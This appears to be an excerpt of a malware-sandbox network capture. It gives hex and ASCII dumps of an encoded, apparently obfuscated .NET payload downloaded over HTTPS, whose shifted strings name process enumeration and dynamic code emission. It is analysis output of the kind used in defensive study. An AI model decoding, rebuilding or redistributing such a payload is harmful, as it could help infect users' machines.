                                                                              Data Ascii: 1{fhq%8HYez%;PWr6%x%X
                                                                              2022-06-01 23:53:22 UTC29INData Raw: f8 f8 fd fb f8 f8 09 f8 3a f8 8b f8 0b f9 f8 f8 ff fb f8 f8 09 f8 3a f8 8b f8 f8 f9 f8 f8 2b f8 25 f8 fd f8 3a f8 8b f8 08 f9 f8 f8 e1 f8 e1 f8 09 f8 3c f8 8b f8 f8 f9 f8 f8 29 f8 29 f8 fd f8 3c f8 8b f8 08 f9 f8 f8 e1 f8 23 f8 09 f8 3e f8 8b f8 f8 f9 08 f8 23 f8 29 f8 0d f8 3e f8 8b f8 f8 f8 08 f8 29 f8 af f8 0d f8 3e f8 8c f8 f8 f8 08 f8 29 f8 e5 fa 0d f8 3e f8 8d f8 f8 f8 08 f8 2b f8 23 f8 0d f8 3e f8 8e f8 f8 f8 08 f8 e5 fa 23 f8 0d f8 3e f8 8f f8 f8 f8 08 f8 e1 f8 29 f8 0d f8 3e f8 90 f8 f9 f9 f8 f8 0b fb 15 fb 01 f8 3e f8 91 f8 79 f9 f8 f8 2d fb 3d fb fd f8 3e f8 95 f8 79 f9 08 f8 58 fb 3d fb fd f8 40 f8 97 f8 f8 f9 f8 f8 23 f8 23 f8 fd f8 40 f8 98 f8 0b f9 f8 f8 23 f8 f8 f8 09 f8 41 f8 98 f8 f8 f8 f8 f8 2b f8 2b f8 fd f8 41 f8 98 f8 f8 f9 08 f8 e5
                                                                              Data Ascii: ::+%:<))<#>#)>)>)>+#>#>)>>y-=>yX=@##@#A++A
                                                                              2022-06-01 23:53:22 UTC30INData Raw: f9 f8 f9 f8 f8 40 fc f8 f8 01 f8 d7 f8 85 f9 f8 f9 f8 f8 43 fc f8 f8 01 f8 d8 f8 88 f9 f8 f9 f8 f8 46 fc f8 f8 01 f8 d9 f8 8b f9 f8 f9 f8 f8 49 fc f8 f8 01 f8 da f8 8e f9 f8 f9 f8 f8 4c fc f8 f8 01 f8 dc f8 91 f9 f8 f9 f8 f8 4f fc f8 f8 01 f8 de f8 94 f9 f8 f9 f8 f8 52 fc f8 f8 01 f8 e0 f8 97 f9 f8 f9 f8 f8 55 fc f8 f8 01 f8 e2 f8 9a f9 f8 f9 f8 f8 58 fc f8 f8 01 f8 e4 f8 9d f9 f8 f9 f8 f8 5c fc f8 f8 01 f8 e5 f8 a0 f9 f8 f9 f8 f8 60 fc f8 f8 01 f8 e7 f8 a3 f9 f8 f9 f8 f8 64 fc f8 f8 01 f8 e8 f8 a6 f9 0e f8 23 f8 02 f8 0e f8 23 f8 06 f8 0e f8 7d fc 06 f8 0e f8 7d fc 09 f8 0e f8 81 fc 06 f8 0e f8 8c fc 06 f8 0e f8 99 fc 06 f8 0e f8 a6 fc 0c f8 0e f8 b1 fc 10 f8 0e f8 bc fc 10 f8 0e f8 c9 fc 10 f8 0e f8 d5 fc 13 f8 0e f8 e2 fc 0c f8 0e f8 f0 fc 09 f8 0e f8
                                                                              Data Ascii: @CFILORUX\`d##}}
                                                                              2022-06-01 23:53:22 UTC31INData Raw: bd 03 9b fa 0b f8 10 fc a6 fa 0b f8 13 fc a6 fa 0b f8 16 fc b2 fa 0b f8 19 fc bb fa 0b f8 e4 03 bb fa 0b f8 1c fc bb fa 0b f8 e8 03 bb fa 0b f8 1f fc c5 fa 0b f8 22 fc c5 fa 0b f8 25 fc d0 fa 0b f8 07 04 d0 fa 0b f8 28 fc da fa 0b f8 2b fc e4 fa 0b f8 1e 04 e4 fa 0b f8 2e fc ee fa 0b f8 2f 04 ee fa 0b f8 31 fc ee fa 0b f8 45 04 ee fa 0b f8 34 fc ee fa 0b f8 56 04 ee fa 0b f8 37 fc fa fb 0b f8 98 04 fa fb 0b f8 3a fc 06 fb 0b f8 bc 04 06 fb 0b f8 3d fc 11 fb 0b f8 40 fc 1c fb 0b f8 43 fc 26 fb 0b f8 46 fc 26 fb 0b f8 49 fc 26 fb 0b f8 4c fc 30 fb 0b f8 00 05 30 fb 0b f8 4f fc 3a fb 0b f8 52 fc 43 fb 0b f8 55 fc 43 fb 0b f8 58 fc 43 fb 0b f8 5c fc 4e fb 0b f8 61 05 4e fb 0b f8 60 fc 59 fb 0b f8 66 05 59 fb 0b f8 64 fc 65 fb 0b f8 80 05 71 fb 0b f8 84 05 7c
                                                                              Data Ascii: "%(+./1E4V7:=@C&F&I&L00O:RCUCXC\NaN`YfYdeq|
                                                                              2022-06-01 23:53:22 UTC33INData Raw: f8 38 3c f8 f8 f8 f8 8e f8 54 09 5e fb 22 f8 5c 3c f8 f8 f8 f8 8e f8 78 09 6a fb 24 f8 80 3c f8 f8 f8 f8 8e f8 9d 09 76 fb 26 f8 a0 3c f8 f8 f8 f8 8e f8 0f fe 4a fd 27 f8 20 3d f8 f8 f8 f8 8e f8 b7 09 52 fd 27 f8 90 3d f8 f8 f8 f8 8e f8 12 fd a2 fc 29 f8 dc 3d f8 f8 f8 f8 89 f8 23 f8 59 fd 29 f8 78 42 f8 f8 f8 f8 8e f8 0b fe a2 fc 29 f8 c0 42 f8 f8 f8 f8 8e f8 4a f8 a2 fc 29 f8 0c 43 f8 f8 f8 f8 8e f8 13 fe a2 fc 29 f8 f8 f8 f8 f8 78 f8 8e 58 da 09 62 fd 29 f8 58 43 f8 f8 f8 f8 7e 10 0c 07 97 fa 2b f8 60 43 f8 f8 f8 f8 89 10 02 07 a2 fc 2b f8 f8 f8 f8 f8 fb f8 7e 10 0c 07 e4 fc 2b f8 f8 f8 f8 f8 fb f8 be f9 d2 ff 69 fd 2d f8 f8 f8 f8 f8 fb f8 be f9 51 07 70 fd 2f f8 f8 f8 f8 f8 fb f8 be f9 81 07 7d fd 33 f8 e8 43 f8 f8 f8 f8 7e 10 0c 07 97 fa 34 f8 f0 43
                                                                              Data Ascii: 8<T^"\<xj$<v&<J' =R'=)=#Y)xB)BJ)C)xXb)XC~+`C+~+i-Qp/}3C~4C
                                                                              2022-06-01 23:53:22 UTC34INData Raw: 97 fa af f8 68 56 f8 f8 f8 f8 7e 10 0c 07 97 fa af f8 70 56 f8 f8 f8 f8 fe 10 0c 07 42 f9 af f8 f8 f8 f8 f8 fb f8 fe 10 0c 07 e4 fc af f8 f8 f8 f8 f8 fb f8 3e f8 d2 ff dc fe af f8 78 56 f8 f8 f8 f8 08 10 02 07 a2 fc af f8 f8 f8 f8 f8 fb f8 fe 10 0c 07 e4 fc af f8 f8 f8 f8 f8 fb f8 3e f8 d2 ff e4 fe af f8 88 56 f8 f8 f8 f8 08 10 02 07 a2 fc af f8 f8 f8 f8 f8 fb f8 fe 10 0c 07 e4 fc af f8 f8 f8 f8 f8 fb f8 3e f8 d2 ff e9 fe af f8 98 56 f8 f8 f8 f8 08 10 02 07 a2 fc af f8 f8 f8 f8 f8 fb f8 fe 10 0c 07 e4 fc af f8 f8 f8 f8 f8 fb f8 3e f8 d2 ff ef fe af f8 a8 56 f8 f8 f8 f8 08 10 02 07 a2 fc af f8 f8 f8 f8 f8 fb f8 fe 10 0c 07 e4 fc af f8 f8 f8 f8 f8 fb f8 3e f8 d2 ff f4 fe af f8 b8 56 f8 f8 f8 f8 08 10 02 07 a2 fc af f8 f8 f8 f8 f8 fb f8 fe 10 0c 07 e4 fc af
                                                                              Data Ascii: hV~pVB>xV>V>V>V>V
                                                                              2022-06-01 23:53:22 UTC36INData Raw: 10 02 07 a2 fc af f8 f8 f8 f8 f8 fb f8 fe 10 0c 07 e4 fc af f8 f8 f8 f8 f8 fb f8 3e f8 d2 ff 96 ff af f8 78 58 f8 f8 f8 f8 08 10 02 07 a2 fc af f8 f8 f8 f8 f8 fb f8 fe 10 0c 07 e4 fc af f8 f8 f8 f8 f8 fb f8 3e f8 d2 ff 9d ff af f8 88 58 f8 f8 f8 f8 08 10 02 07 a2 fc af f8 f8 f8 f8 f8 fb f8 fe 10 0c 07 e4 fc af f8 f8 f8 f8 f8 fb f8 3e f8 d2 ff a4 ff af f8 98 58 f8 f8 f8 f8 08 10 02 07 a2 fc af f8 f8 f8 f8 f8 fb f8 fe 10 0c 07 e4 fc af f8 f8 f8 f8 f8 fb f8 3e f8 d2 ff ab ff af f8 a8 58 f8 f8 f8 f8 08 10 02 07 a2 fc af f8 f8 f8 f8 f8 fb f8 fe 10 0c 07 e4 fc af f8 f8 f8 f8 f8 fb f8 3e f8 d2 ff 70 ff af f8 b8 58 f8 f8 f8 f8 08 10 02 07 a2 fc af f8 f8 f8 f8 f8 fb f8 fe 10 0c 07 e4 fc af f8 f8 f8 f8 f8 fb f8 3e f8 d2 ff b2 ff af f8 c8 58 f8 f8 f8 f8 08 10 02 07
                                                                              Data Ascii: >xX>X>X>X>pX>X
                                                                              2022-06-01 23:53:22 UTC37INData Raw: fb f8 3e f8 d2 ff 4f 00 af f8 80 5a f8 f8 f8 f8 08 10 02 07 a2 fc af f8 f8 f8 f8 f8 fb f8 fe 10 0c 07 e4 fc af f8 f8 f8 f8 f8 fb f8 3e f8 d2 ff 55 00 af f8 94 5a f8 f8 f8 f8 08 10 02 07 a2 fc af f8 f8 f8 f8 f8 fb f8 fe 10 0c 07 e4 fc af f8 f8 f8 f8 f8 fb f8 3e f8 d2 ff 5a 00 af f8 a8 5a f8 f8 f8 f8 08 10 02 07 a2 fc af f8 f8 f8 f8 f8 fb f8 fe 10 0c 07 e4 fc af f8 f8 f8 f8 f8 fb f8 3e f8 d2 ff 60 00 af f8 bc 5a f8 f8 f8 f8 08 10 02 07 a2 fc af f8 f8 f8 f8 f8 fb f8 fe 10 0c 07 e4 fc af f8 f8 f8 f8 f8 fb f8 3e f8 d2 ff 66 00 af f8 d0 5a f8 f8 f8 f8 08 10 02 07 a2 fc af f8 f8 f8 f8 f8 fb f8 fe 10 0c 07 e4 fc af f8 f8 f8 f8 f8 fb f8 3e f8 d2 ff c3 f8 af f8 e4 5a f8 f8 f8 f8 08 10 02 07 a2 fc af f8 f8 f8 f8 f8 fb f8 fe 10 0c 07 e4 fc af f8 f8 f8 f8 f8 fb f8 3e
                                                                              Data Ascii: >OZ>UZ>ZZ>`Z>fZ>Z>
                                                                              2022-06-01 23:53:22 UTC38INData Raw: f8 fb f8 78 07 f8 f8 fc f8 3f 07 f8 f8 f9 f8 8b 07 f8 f8 f9 f8 3f 07 f8 f8 fa f8 46 07 f8 f8 f9 f8 2f 0a f8 f8 fa f8 37 0a f8 f8 fb f8 43 0a f8 f8 fc f8 4a 0a f8 f8 fd f8 55 0a f8 f8 f9 f8 2f 0a f8 f8 fa f8 37 0a f8 f8 fb f8 43 0a f8 f8 fc f8 4a 0a f8 f8 fd f8 55 0a f8 f8 fe f8 78 07 f8 f8 ff f8 3f 07 f8 f8 f9 f8 43 0a f8 f8 fa f8 55 0a f8 f8 fb f8 8b 07 f8 18 fa f8 e1 f8 f8 18 f9 f8 29 f8 f8 f8 f9 f8 29 f8 08 08 fa f8 e1 f8 f8 f8 f9 f8 29 f8 f8 f8 fa f8 e1 f8 f8 f8 f9 f8 3f 07 f8 f8 fa f8 46 07 f8 f8 f9 f8 2f 0a f8 f8 fa f8 37 0a f8 f8 f9 f8 2f 0a f8 f8 fa f8 37 0a f8 f8 fb f8 78 07 f8 f8 fc f8 3f 07 f8 f8 f9 f8 8b 07 f8 f8 f9 f8 3f 07 f8 f8 fa f8 46 07 f8 f8 f9 f8 84 0a f8 f8 f9 f8 84 0a f8 f8 fa f8 78 07 f8 f8 fb f8 3f 07 f8 f8 f9 f8 8b 07 f8 f8 f9 f8
                                                                              Data Ascii: x??F/7CJU/7CJUx?CU)))?F/7/7x??Fx?
                                                                              2022-06-01 23:53:22 UTC39INData Raw: c0 fa 71 f8 f8 04 c0 fa 71 f8 ff 04 ca fa b9 f8 0b 04 d5 fa 11 f8 12 04 df fa 11 f8 22 04 e9 fa 11 f8 33 04 e9 fa 61 f9 49 04 e9 fa 79 f9 6b 04 f3 fa 79 f9 9c 04 ff fb 91 f9 c5 04 0b fb 99 f9 df 04 16 fb 91 f9 e3 04 21 fb 91 f9 e7 04 21 fb 91 f9 ef 04 21 fb 71 f8 f4 04 2b fb c9 f8 04 05 35 fb 99 f9 0b 05 3f fb a1 f9 2e 05 3f fb 99 f9 42 05 3f fb a9 f9 5c 05 48 fb 29 f8 0b fb 53 fb b1 f9 da 01 5e fb b1 f9 78 05 6a fb b1 f9 12 01 76 fb c9 f8 da 01 81 fb 79 f8 8c 05 8b fb 71 f8 9f 05 96 fb e1 f8 aa 05 a1 fb b9 f9 bc 05 ac fb 61 f8 c2 00 b5 fb 19 f9 cd 05 c5 fb 19 f9 e1 05 d2 fb c1 f9 06 06 de fb a1 f8 12 06 f4 fb c9 f8 da 01 07 fc c9 f8 da 01 11 fc c9 f8 04 05 1b fc e1 f8 48 06 25 fc 31 f9 59 06 2f fc b9 f9 cd 03 3b fc b9 f9 c1 03 3b fc 71 f8 73 06 46 fc a1
                                                                              Data Ascii: qq"3aIyky!!!q+5?.?B?\H)S^xjvyqaH%1Y/;;qsF
                                                                              2022-06-01 23:53:22 UTC41INData Raw: f8 f8 f9 ff f9 4c 0b fa f8 74 5c f8 f8 2b f8 d0 5c f8 f8 2c f8 d8 5c f8 f8 2d f8 e1 5c f8 f8 2e f8 e6 5c f8 f8 2f f8 fe 5d f8 f8 30 f8 07 5d f8 f8 31 f8 0e 5d f8 f8 32 f8 39 5d f8 f8 33 f8 3f 7d f8 f8 34 f8 4f 7d f8 f8 35 f8 56 7e f8 f8 36 f8 6b 7e f8 f8 37 f8 71 7e f8 f8 38 f8 78 7e f8 f8 39 f8 a5 7e f8 f8 3a f8 8f 80 f8 f8 3c f8 6b 82 f8 f8 40 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f9 f8 f8 f8 fc f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f9 f8 0c f8 f8 f8 f8 f8 fc f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f9 f8 66 f8 f8 f8 f8 f8 fc f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f9 f8 1c f8 f8 f8 f8 f8 02 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 de f9 c0 01 f8 f8 f8 f8 fc f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 de f9 b7 02 f8 f8 f8 f8 fc f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 de f9 83 04
                                                                              Data Ascii: Lt\+\,\-\.\/]0]1]29]3?}4O}5V~6k~7q~8x~9~:<k@f
                                                                              2022-06-01 23:53:22 UTC42INData Raw: 17 f8 77 f8 ba 78 f8 ba 79 f8 ba 7a f8 ba 7b f8 ba 7c f8 ba 7e f8 ba 7f f8 ba 80 f8 ba 81 f8 ba 82 f8 ba 83 f8 ba 84 f8 ba 85 f8 ba 86 f8 ba 87 f8 ba 88 f8 ba 89 f8 ba 8a f8 ba 8b f8 ba 8c f8 ba 8d f8 ba 8e f8 ba 8f f8 ba 90 f8 ba 91 f8 ba 92 f8 ba 93 f8 ba 94 f8 ba 95 f8 ba 96 f8 ba 97 f8 f9 fa f8 fa fa f8 fb fa f8 fc fa f8 fd fa f8 fe fa f8 ff fa f8 00 fa f8 06 fa f8 07 fa f8 08 fa f8 09 fa f8 0a fa f8 0b fa f8 0c fa f8 0d fa f8 0e fa f8 0f fa f8 10 fa f8 11 fa f8 12 fa f8 13 fa f8 14 fa f8 15 fa f8 16 fa f8 17 fa f8 77 fa f8 ba 78 fa f8 ba 79 fa f8 ba 7a fa f8 ba 7b fa f8 3d 66 5b 67 5c 61 66 5f f8 4b 71 6b 6c 5d 65 26 4c 5d 70 6c f8 d9 7a 9b f8 61 c7 8a c1 9a c6 89 e7 b7 b5 f8 e1 80 97 ca 87 d2 b7 e1 80 7f ba a3 f8 bd 86 cd b3 d3 92 e7 b7 b5 e7 b7 b5
                                                                              Data Ascii: wxyz{|~wxyz{=f[g\af_Kqkl]e&L]plza
                                                                              2022-06-01 23:53:22 UTC43INData Raw: 67 66 48 67 61 66 6c 5d 6a f8 3c 5d 64 5d 5f 59 6c 5d f8 3f 5d 6c 3a 71 6c 5d 6b f8 76 17 f8 5f 5d 6c 57 4d 66 61 5b 67 5c 5d f8 5f 5d 6c 57 39 4b 3b 41 41 f8 5f 5d 6c 57 3c 5d 5e 59 6d 64 6c f8 5f 5d 6c 57 4d 4c 3e 30 f8 3f 5d 6c 3b 6d 6a 6a 5d 66 6c 48 6a 67 5b 5d 6b 6b f8 5f 5d 6c 57 45 59 61 66 45 67 5c 6d 64 5d f8 76 ba 7c f8 5f 5d 6c 57 3e 61 64 5d 46 59 65 5d f8 76 ba 7e f8 4c 67 4b 6c 6a 61 66 5f f8 76 ba 7f f8 5f 5d 6c 57 48 6a 67 5b 5d 6b 6b 46 59 65 5d f8 76 ba 80 f8 48 59 6c 60 f8 3b 67 65 5a 61 66 5d f8 3f 5d 6c 48 6a 67 5b 5d 6b 6b 5d 6b 3a 71 46 59 65 5d f8 45 61 5b 6a 67 6b 67 5e 6c 26 4e 61 6b 6d 59 64 3a 59 6b 61 5b f8 44 5d 66 f8 4c 67 41 66 6c 2b 2a f8 3f 5d 6c 3b 60 59 6a f8 3b 60 6a 4f f8 3d 66 6e 61 6a 67 66 65 5d 66 6c f8 3f 5d 6c
                                                                              Data Ascii: gfHgafl]j<]d]_Yl]?]l:ql]kv_]lWMfa[g\]_]lW9K;AA_]lW<]^Ymdl_]lWML>0?]l;mjj]flHjg[]kk_]lWEYafEg\md]v|_]lW>ad]FYe]v~LgKljaf_v_]lWHjg[]kkFYe]vHYl`;geZaf]?]lHjg[]kk]k:qFYe]Ea[jgkg^l&NakmYd:Yka[D]fLgAfl+*?]l;`Yj;`jO=fnajgfe]fl?]l
                                                                              2022-06-01 23:53:22 UTC45INData Raw: f8 3b 67 65 68 59 6a 5d 4b 6c 6a 61 66 5f f8 ba 8d fa f8 ba 8e fa f8 ba 8f fa f8 4b 68 64 61 6c f8 ba 90 fa f8 76 ba 90 fa f8 5f 5d 6c 57 39 6b 6b 5d 65 5a 64 71 f8 ba 91 fa f8 76 ba 91 fa f8 3f 5d 6c 47 5a 62 5d 5b 6c f8 ba 92 fa f8 76 ba 92 fa f8 ba 93 fa f8 76 ba 93 fa f8 3f 5d 6c 3d 70 5d 5b 6d 6c 61 66 5f 39 6b 6b 5d 65 5a 64 71 f8 ba 94 fa f8 3f 5d 6c 45 59 66 61 5e 5d 6b 6c 4a 5d 6b 67 6d 6a 5b 5d 4b 6c 6a 5d 59 65 f8 ba 95 fa f8 76 ba 95 fa f8 ba 96 fa f8 4a 5d 59 5c f8 ba 97 fa f8 76 ba 97 fa f8 26 5b 5b 6c 67 6a f8 3a 3a f8 26 5b 6c 67 6a f8 e7 b7 b5 e7 b7 b5 c7 a9 e1 80 7f e7 b7 b5 f8 e7 b7 b5 e7 b7 b5 c6 7d e3 82 b3 c4 a6 f8 e7 b7 b5 d7 7a bb 9d bd ac ca 9a f8 d9 7a a0 f8 67 5a 62 5d 5b 6c f8 65 5d 6c 60 67 5c f8 59 f8 5a f8 3a 5d 5f 61 66 41
                                                                              Data Ascii: ;gehYj]Kljaf_Khdalv_]lW9kk]eZdqv?]lGZb][lvv?]l=p][mlaf_9kk]eZdq?]lEYfa^]klJ]kgmj[]Klj]YevJ]Y\v&[[lgj::&[lgj}zzgZb][le]l`g\YZ:]_afA
                                                                              2022-06-01 23:53:22 UTC46INData Raw: 6c 5d 45 5d 65 5a 5d 6a 4a 5d 5e 6b 3c 5d 64 5d 5f 59 6c 5d 6b f8 6c 71 68 5d 41 3c f8 3b 6a 5d 59 6c 5d 3f 5d 6c 4b 6c 6a 61 66 5f 3c 5d 64 5d 5f 59 6c 5d f8 67 6f 66 5d 6a 4c 71 68 5d f8 e3 94 b0 c2 a2 bc 8b e7 b7 b5 d1 ad f8 bd 7e e7 7a b1 e7 b7 b5 d4 a2 cd 7c f8 d6 b0 ce 87 e7 b7 b5 e7 b7 b5 e7 b7 b5 f8 bb 8a ba a3 cf 81 e7 b6 a5 c2 8b f8 4d 66 6e 5d 6a 61 5e 61 59 5a 64 5d 3b 67 5c 5d 39 6c 6c 6a 61 5a 6d 6c 5d f8 4b 71 6b 6c 5d 65 26 4b 5d 5b 6d 6a 61 6c 71 f8 4c 59 6a 5f 5d 6c 3e 6a 59 65 5d 6f 67 6a 63 39 6c 6c 6a 61 5a 6d 6c 5d f8 4b 71 6b 6c 5d 65 26 4a 6d 66 6c 61 65 5d 26 4e 5d 6a 6b 61 67 66 61 66 5f f8 46 5d 6d 6c 6a 59 64 4a 5d 6b 67 6d 6a 5b 5d 6b 44 59 66 5f 6d 59 5f 5d 39 6c 6c 6a 61 5a 6d 6c 5d f8 4d 64 6c 61 65 59 6c 5d 4a 5d 6b 67 6d
                                                                              Data Ascii: l]E]eZ]jJ]^k<]d]_Yl]klqh]A<;j]Yl]?]lKljaf_<]d]_Yl]gof]jLqh]~z|Mfn]ja^aYZd];g\]9lljaZml]Kqkl]e&K][mjalqLYj_]l>jYe]ogjc9lljaZml]Kqkl]e&Jmflae]&N]jkagfaf_F]mljYdJ]kgmj[]kDYf_mY_]9lljaZml]MdlaeYl]J]kgm
                                                                              2022-06-01 23:53:22 UTC47INData Raw: 5c 40 59 66 5c 64 5d f8 4a 6d 66 6c 61 65 5d 45 5d 6c 60 67 5c 40 59 66 5c 64 5d f8 3f 5d 6c 45 5d 6c 60 67 5c 3e 6a 67 65 40 59 66 5c 64 5d f8 5f 5d 6c 57 41 6b 4b 6c 59 6c 61 5b f8 5f 5d 6c 57 3e 61 5d 64 5c 4c 71 68 5d f8 3b 6a 5d 59 6c 5d 3c 5d 64 5d 5f 59 6c 5d f8 3f 5d 6c 48 59 6a 59 65 5d 6c 5d 6a 6b f8 48 59 6a 59 65 5d 6c 5d 6a 41 66 5e 67 f8 5f 5d 6c 57 48 59 6a 59 65 5d 6c 5d 6a 4c 71 68 5d f8 5f 5d 6c 57 4a 5d 6c 6d 6a 66 4c 71 68 5d f8 3c 71 66 59 65 61 5b 45 5d 6c 60 67 5c f8 4b 71 6b 6c 5d 65 26 4a 5d 5e 64 5d 5b 6c 61 67 66 26 3d 65 61 6c f8 3f 5d 6c 41 44 3f 5d 66 5d 6a 59 6c 67 6a f8 41 44 3f 5d 66 5d 6a 59 6c 67 6a f8 47 68 3b 67 5c 5d 6b f8 44 5c 59 6a 5f 57 28 f8 47 68 3b 67 5c 5d f8 3d 65 61 6c f8 44 5c 59 6a 5f 57 29 f8 44 5c 59 6a
                                                                              Data Ascii: \@Yf\d]Jmflae]E]l`g\@Yf\d]?]lE]l`g\>jge@Yf\d]_]lWAkKlYla[_]lW>a]d\Lqh];j]Yl]<]d]_Yl]?]lHYjYe]l]jkHYjYe]l]jAf^g_]lWHYjYe]l]jLqh]_]lWJ]lmjfLqh]<qfYea[E]l`g\Kqkl]e&J]^d][lagf&=eal?]lAD?]f]jYlgjAD?]f]jYlgjGh;g\]kD\Yj_W(Gh;g\]=ealD\Yj_W)D\Yj
                                                                              2022-06-01 23:53:22 UTC49INData Raw: 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28
                                                                              Data Ascii: ((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((
                                                                              2022-06-01 23:53:22 UTC50INData Raw: f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8
                                                                              Data Ascii: (((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((
                                                                              2022-06-01 23:53:22 UTC51INData Raw: 28 f8 28 f8 2e f8 3c f8 28 f8 28 f8 2e f8 2d f8 28 f8 28 f8 2e f8 2c f8 28 f8 28 f8 2e f8 29 f8 28 f8 28 f8 2f f8 2a f8 28 f8 28 f8 2d f8 2c f8 28 f8 28 f8 2e f8 3b f8 28 f8 28 f8 2e f8 29 f8 28 f8 28 f8 2e f8 2f f8 28 f8 28 f8 2e f8 2d f8 28 f8 28 f8 2c f8 3b f8 28 f8 28 f8 28 f8 29 f8 28 f8 28 f8 28 f8 29 f8 28 f8 28 f8 2a f8 39 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 2b f8 2a f8 28 f8 28 f8 2b f8 2a f8 28 f8 28 f8 2b f8 28 f8 28 f8 28 f8 2b f8 2a f8 28 f8 28 f8 2a f8 28 f8 28 f8 28 f8 2a f8 28 f8 28 f8 28 f8 39 f8 31 f8 28 f8 28 f8 2a f8 28 f8 28 f8 28 f8 2f f8 2c f8 28 f8 28 f8 2e f8 30 f8 28 f8 28 f8 2e f8 2f f8 28 f8 28 f8 2e f8 31 f8 28 f8 28 f8 2f f8 2a f8 28 f8 28 f8 2f f8 31 f8 28 f8 28 f8 2f f8 28 f8 28 f8 28 f8 2e f8 3e f8 28 f8 28 f8 2c f8 2b
                                                                              Data Ascii: ((.<((.-((.,((.)((/*((-,((.;((.)((./((.-((,;((()((()((*9((((((+*((+*((+(((+*((*(((*(((91((*(((/,((.0((./((.1((/*((/1((/(((.>((,+
                                                                              2022-06-01 23:53:22 UTC53INData Raw: f8 28 f8 2e f8 3e f8 28 f8 28 f8 2e f8 2e f8 28 f8 28 f8 2e f8 3d f8 28 f8 28 f8 2c f8 31 f8 28 f8 28 f8 2e f8 2d f8 28 f8 28 f8 2e f8 3b f8 28 f8 28 f8 2e f8 31 f8 28 f8 28 f8 2c f8 2e f8 28 f8 28 f8 2e f8 2f f8 28 f8 28 f8 2e f8 3d f8 28 f8 28 f8 2e f8 31 f8 28 f8 28 f8 2f f8 2a f8 28 f8 28 f8 2f f8 2c f8 28 f8 28 f8 2d f8 2b f8 28 f8 28 f8 28 f8 29 f8 28 f8 28 f8 28 f8 28 f8 28 f8 2a f8 2d f8 3b f8 28 f8 2c f8 3a f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 2e f8 3d f8 28 f8 28 f8 2e f8 3e f8 28 f8 28 f8 2e f8 31 f8 28 f8 28 f8 2f f8 2c f8 28 f8 28 f8 2e f8 29 f8 28 f8 28 f8 2e f8 3b f8 28 f8 28 f8 2f f8 2b f8 28 f8 28 f8 2e f8 3d f8 28 f8 28 f8 2e f8 29 f8 28 f8 28 f8 2f f8 2a f8 28 f8 28 f8 2d f8 2c f8
                                                                              Data Ascii: (.>((..((.=((,1((.-((.;((.1((,.((./((.=((.1((/*((/,((-+((()(((((*-;(,:(((((((((((((((.=((.>((.1((/,((.)((.;((/+((.=((.)((/*((-,
